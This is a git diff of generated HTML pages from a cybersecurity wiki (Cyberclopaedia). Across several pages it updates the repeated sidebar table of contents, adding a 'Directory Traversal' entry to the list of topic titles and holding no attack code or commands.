      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
@@ -192,22 +192,6 @@

Stack Frames - - diff --git a/docs/Reverse Engineering/Program Anatomy/index.html b/docs/Reverse Engineering/Program Anatomy/index.html index 14b9e3c2..3a7d4c50 100644 --- a/docs/Reverse Engineering/Program Anatomy/index.html +++ b/docs/Reverse Engineering/Program Anatomy/index.html @@ -100,7 +100,7 @@
-
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. HTTP Parameter Pollution
      12. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
+
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. Directory Traversal
      12. HTTP Parameter Pollution
      13. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
@@ -175,22 +175,6 @@

Program Anato - - diff --git a/docs/Reverse Engineering/Reverse Engineering with Ghidra/Creating a Project and Loading a Binary.html b/docs/Reverse Engineering/Reverse Engineering with Ghidra/Creating a Project and Loading a Binary.html index e50c5bca..f1bf1547 100644 --- a/docs/Reverse Engineering/Reverse Engineering with Ghidra/Creating a Project and Loading a Binary.html +++ b/docs/Reverse Engineering/Reverse Engineering with Ghidra/Creating a Project and Loading a Binary.html @@ -100,7 +100,7 @@
-
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. HTTP Parameter Pollution
      12. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
+
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. Directory Traversal
      12. HTTP Parameter Pollution
      13. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
@@ -205,22 +205,6 @@

Loading a B - - diff --git a/docs/Reverse Engineering/Reverse Engineering with Ghidra/Initial Analysis.html b/docs/Reverse Engineering/Reverse Engineering with Ghidra/Initial Analysis.html index aabaf49e..eacec03b 100644 --- a/docs/Reverse Engineering/Reverse Engineering with Ghidra/Initial Analysis.html +++ b/docs/Reverse Engineering/Reverse Engineering with Ghidra/Initial Analysis.html @@ -100,7 +100,7 @@
-
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
